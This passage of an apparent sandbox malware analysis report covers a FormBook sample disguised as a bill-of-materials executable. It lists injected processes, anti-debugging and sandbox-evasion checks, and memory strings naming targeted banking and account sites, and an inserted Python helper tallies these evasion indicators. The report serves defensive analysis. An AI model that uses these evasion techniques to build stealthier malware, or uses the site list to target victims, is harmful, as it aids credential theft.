            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403110 push eax; ret 2_2_00403112
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040A987 push ebp; ret 2_2_0040A99B
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417CE3 push eax; ret 2_2_00417CE4
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00413FF7 push ss; retf 2_2_0041403C
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417FAD push esp; iretd 2_2_00417FB3
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380225F pushad ; ret 2_2_038027F9
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038027FA pushad ; ret 2_2_038027F9
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038309AD push ecx; mov dword ptr [esp], ecx 2_2_038309B6
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380283D push eax; iretd 2_2_03802858
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03801368 push eax; iretd 2_2_03801369
            Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_047327FA pushad ; ret 6_2_047327F9
            Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0473225F pushad ; ret 6_2_047327F9
            Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0473283D push eax; iretd 6_2_04732858
            Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_047609AD push ecx; mov dword ptr [esp], ecx 6_2_047609B6
            Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0081078C push FFFFFFA4h; ret 6_2_0081079A
            Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_00814BD0 push eax; ret 6_2_00814BD1
            Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_00814E9A push esp; iretd 6_2_00814EA0
            Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0080EFED push edi; iretd 6_2_0080EFEE
            Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_008212B6 pushad ; ret 6_2_008212F3
            Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_00811720 push ss; retf 6_2_0081172F
            Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0080787F push ebp; ret 6_2_00807888
            Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_00819BBE push ss; ret 6_2_00819C63
            Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_045C2760 push edx; retf 6_2_045C2761
            Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_045D5072 push eax; ret 6_2_045D5074
            Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_045C5104 push esp; retf 6_2_045C5106
            Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_045C51DC push es; retf 6_2_045C51E3
            Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_045C53B2 push FFFFFFACh; ret 6_2_045C53EF
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	File created: \copy of 01. bill of material - 705.exe
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Code function: 0_2_0034F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_0034F98E
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Code function: 0_2_003C1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_003C1C41
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rasdial.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep graph_0-97567
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	API/Special instruction interceptor: Address: 1383214
            Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387096E rdtsc 2_2_0387096E
            Source: C:\Windows\SysWOW64\rasdial.exe	Window / User API: threadDelayed 4338
            Source: C:\Windows\SysWOW64\rasdial.exe	Window / User API: threadDelayed 5635
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	API coverage: 3.9 %
            Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\rasdial.exe	API coverage: 2.7 %
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 4392	Thread sleep count: 4338 > 30
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 4392	Thread sleep time: -8676000s >= -30000s
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 4392	Thread sleep count: 5635 > 30
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 4392	Thread sleep time: -11270000s >= -30000s
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe TID: 5588	Thread sleep time: -80000s >= -30000s
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe TID: 5588	Thread sleep count: 36 > 30
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe TID: 5588	Thread sleep time: -54000s >= -30000s
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe TID: 5588	Thread sleep count: 41 > 30
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe TID: 5588	Thread sleep time: -41000s >= -30000s
            Source: C:\Windows\SysWOW64\rasdial.exe	Last function: Thread delayed
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0039DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0039DBBE
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0036C2A2 FindFirstFileExW,0_2_0036C2A2
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003A68EE FindFirstFileW,FindClose,0_2_003A68EE
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_003A698F
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0039D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0039D076
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0039D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0039D3A9
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003A9642
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003A979D
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_003A9B2B
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003A5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_003A5C97
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0081C420 FindFirstFileW,FindNextFileW,FindClose,6_2_0081C420
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003342DE
            Source: A7b2-53.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: rasdial.exe, 00000006.00000002.4655489045.0000000007A67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EU WestVMware20,11696487552n
            Source: A7b2-53.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: A7b2-53.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: rasdial.exe, 00000006.00000002.4655489045.0000000007A67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: soft.com/profileVMware20,1169648
            Source: A7b2-53.6.drBinary or memory string: discord.comVMware20,11696487552f
            Source: rasdial.exe, 00000006.00000002.4655489045.0000000007A67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware2qQ
            Source: A7b2-53.6.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: rasdial.exe, 00000006.00000002.4655489045.0000000007A67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: omVMware20,11696487552|UE
            Source: rasdial.exe, 00000006.00000002.4655489045.0000000007A67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ve Brokers - HKVMware20,11696487
Source: rasdial.exe, 00000006.00000002.4655489045.0000000007A67000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rs.co.inVMware20,11696487552~
Source: A7b2-53.6.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: A7b2-53.6.dr | Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: A7b2-53.6.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: A7b2-53.6.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: A7b2-53.6.dr | Binary or memory string: global block list test formVMware20,11696487552
Source: A7b2-53.6.dr | Binary or memory string: tasks.office.comVMware20,11696487552o
Source: rasdial.exe, 00000006.00000002.4655489045.0000000007A67000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .comVMware20,11696487552t
Source: A7b2-53.6.dr | Binary or memory string: AMC password management pageVMware20,11696487552
Source: rasdial.exe, 00000006.00000002.4642916283.0000000002A59000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2820746689.0000020B23AAC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: A7b2-53.6.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: A7b2-53.6.dr | Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: A7b2-53.6.dr | Binary or memory string: dev.azure.comVMware20,11696487552j
Source: A7b2-53.6.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: A7b2-53.6.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: A7b2-53.6.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: GQXHQykfhUHHi.exe, 00000007.00000002.4649558297.00000000012BF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
Source: A7b2-53.6.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: A7b2-53.6.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: A7b2-53.6.dr | Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: A7b2-53.6.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: A7b2-53.6.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: rasdial.exe, 00000006.00000002.4655489045.0000000007A67000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,1169648
Source: A7b2-53.6.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: A7b2-53.6.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: A7b2-53.6.dr | Binary or memory string: outlook.office.comVMware20,11696487552s
Source: A7b2-53.6.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: A7b2-53.6.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: A7b2-53.6.dr | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: A7b2-53.6.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: A7b2-53.6.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\rasdial.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0387096E rdtsc
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004174F3 LdrLoadDll
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_003AEAA2 BlockInput
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_00362622 IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_003342DE GetVersionExW, GetCurrentProcess, IsWow64Process, LoadLibraryA, GetProcAddress, GetNativeSystemInfo, FreeLibrary, GetSystemInfo, GetSystemInfo
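The evidence rows in this report are the raw material an analyst has to turn into a verdict: a `DebugPort` query is the `NtQueryInformationProcess(ProcessDebugPort)` check, `rdtsc` is the timing check, `BlockInput` and `IsDebuggerPresent` are the user-mode API checks, and on 32-bit Windows `fs:[30h]` is the PEB pointer in the TEB, so each `mov eax, dword ptr fs:[00000030h]` is a function reaching the PEB directly (the usual targets are `BeingDebugged` and `NtGlobalFlag`, though the rows do not show which offset is read afterwards, so that part stays an inference). The helper below is an added example, not part of the Joe Sandbox report or its tooling: it parses rows in the layout this page renders (the three table cells run together on extraction, e.g. `svchost.exeCode function:`, and a `Jump to behavior` link tail), also accepting rows written with a ` | ` cell separator or collapsed with a trailing `(xN)` repeat count, and summarises the anti-analysis indicators per process. The sample rows are copied from the table on this page; `ANTI_DEBUG_APIS` is the example's own list of API names to flag.

```python
import re
from collections import Counter, defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# Row layout as rendered on the page: "Source: <proc|dump>[ | ]<kind>: <detail>".
# The source cell may run straight into the kind cell, so the alternation on the
# kind names is what delimits it.
ROW_RE = re.compile(
    r"^\s*Source:\s*(?P<source>.+?)\s*\|?\s*"
    r"(?P<kind>Code function|Process queried|Process information queried|Binary or memory string)"
    r":\s*(?P<detail>.+?)\s*$"
)
# "2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388": the function id is
# repeated after the body (it was the row's link text). An optional "(xN)" suffix
# marks a row that stands for N identical rows.
FUNC_RE = re.compile(
    r"^(?P<fid>\d+_\d+_[0-9A-Fa-f]+)\s*(?P<body>.*?)\s*(?:(?P=fid))?\s*(?:\(x(?P<n>\d+)\))?$"
)
# A direct read of the PEB pointer out of the 32-bit TEB.
PEB_RE = re.compile(r"\bmov\s+(\w+),\s*dword ptr fs:\[0*30h\]", re.IGNORECASE)
# API names this example flags when they appear in a "Code function" API list.
ANTI_DEBUG_APIS = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent", "BlockInput"}


@dataclass
class Row:
    source: str
    kind: str
    detail: str
    func_id: Optional[str] = None
    body: str = ""
    repeat: int = 1


def parse_row(line: str) -> Optional[Row]:
    """Parse one evidence row; returns None for lines that are not rows."""
    m = ROW_RE.match(line)
    if not m:
        return None
    detail = re.sub(r"\s*Jump to behavior$", "", m["detail"])  # strip link residue
    row = Row(m["source"], m["kind"], detail)
    if row.kind == "Code function":
        f = FUNC_RE.match(detail)
        if f:
            row.func_id, row.body = f["fid"], f["body"]
            row.repeat = int(f["n"]) if f["n"] else 1
    return row


def summarize(lines: List[str]) -> Dict[str, dict]:
    """Group rows by source process/dump and tally anti-analysis indicators."""
    per_proc: Dict[str, dict] = defaultdict(lambda: {
        "peb_read_funcs": set(), "peb_reads": 0, "peb_regs": Counter(),
        "debugport_query": False, "rdtsc_funcs": set(),
        "anti_debug_apis": set(), "vm_strings": 0,
    })
    for line in lines:
        row = parse_row(line)
        if row is None:
            continue
        rec = per_proc[row.source]
        if row.kind == "Process queried" and "DebugPort" in row.detail:
            rec["debugport_query"] = True
        elif row.kind == "Binary or memory string" and "VMware" in row.detail:
            rec["vm_strings"] += 1
        elif row.kind == "Code function" and row.func_id:
            peb = PEB_RE.search(row.body)
            if peb:
                rec["peb_read_funcs"].add(row.func_id)
                rec["peb_reads"] += row.repeat
                rec["peb_regs"][peb.group(1).lower()] += row.repeat
            elif row.body.lower().startswith("rdtsc"):
                rec["rdtsc_funcs"].add(row.func_id)
            else:  # an API call list such as "IsDebuggerPresent,SetUnhandledExceptionFilter,"
                apis = {a.strip() for a in row.body.split(",") if a.strip()}
                rec["anti_debug_apis"] |= apis & ANTI_DEBUG_APIS
    return dict(per_proc)


def indicators(rec: dict) -> List[str]:
    """Flat list of indicator tags for one process record."""
    tags = []
    if rec["peb_read_funcs"]:
        tags.append(f"peb-read:{len(rec['peb_read_funcs'])}funcs/{rec['peb_reads']}reads")
    if rec["debugport_query"]:
        tags.append("debugport-query")
    if rec["rdtsc_funcs"]:
        tags.append("rdtsc-timing")
    tags += sorted(f"api:{a}" for a in rec["anti_debug_apis"])
    if rec["vm_strings"]:
        tags.append(f"vm-strings:{rec['vm_strings']}")
    return tags


# Rows copied from this report's table, in the page's own (run-together) layout,
# plus one row in the separated, count-collapsed form.
SAMPLE_ROWS = [
    r"Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E rdtsc 2_2_0387096E",
    r"Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003AEAA2 BlockInput,0_2_003AEAA2",
    r"Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_00362622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00362622",
    r"Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_00354CE8 mov eax, dword ptr fs:[00000030h]0_2_00354CE8",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov ecx, dword ptr fs:[00000030h]2_2_038DE3DB",
    r"Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h] (x15)",
    r"Source: A7b2-53.6.drBinary or memory string: interactivebrokers.comVMware20,11696487552",
]

if __name__ == "__main__":
    for source, rec in summarize(SAMPLE_ROWS).items():
        print(f"{source}: {', '.join(indicators(rec))}")
```

Run on the full table, the script gives one line per process, which is the shape you want when deciding whether the PEB reads belong to the injected FormBook code in svchost.exe (the `2_2_*` functions) or to the AutoIt runtime of the dropper (the `0_2_*` functions); the repeat count per function is a rough proxy for how much of that function is debugger-check logic.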
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_00354CE8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_01383480 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_013834E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_01381E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0385438F mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038EC3CD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h] (x6)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B63C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DE3DB mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h] (x8)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038663FF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382C310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03850310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03908324 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h] (x15)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B035C mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038FA352 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038D8350 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0390634F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038D437C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038C62A0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h] (x5)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039062D6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382823B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B8243 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B8243 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0390625D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382A250 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03836259 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382826B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h] (x12)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03870185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039061E5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038601F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h] (x2)
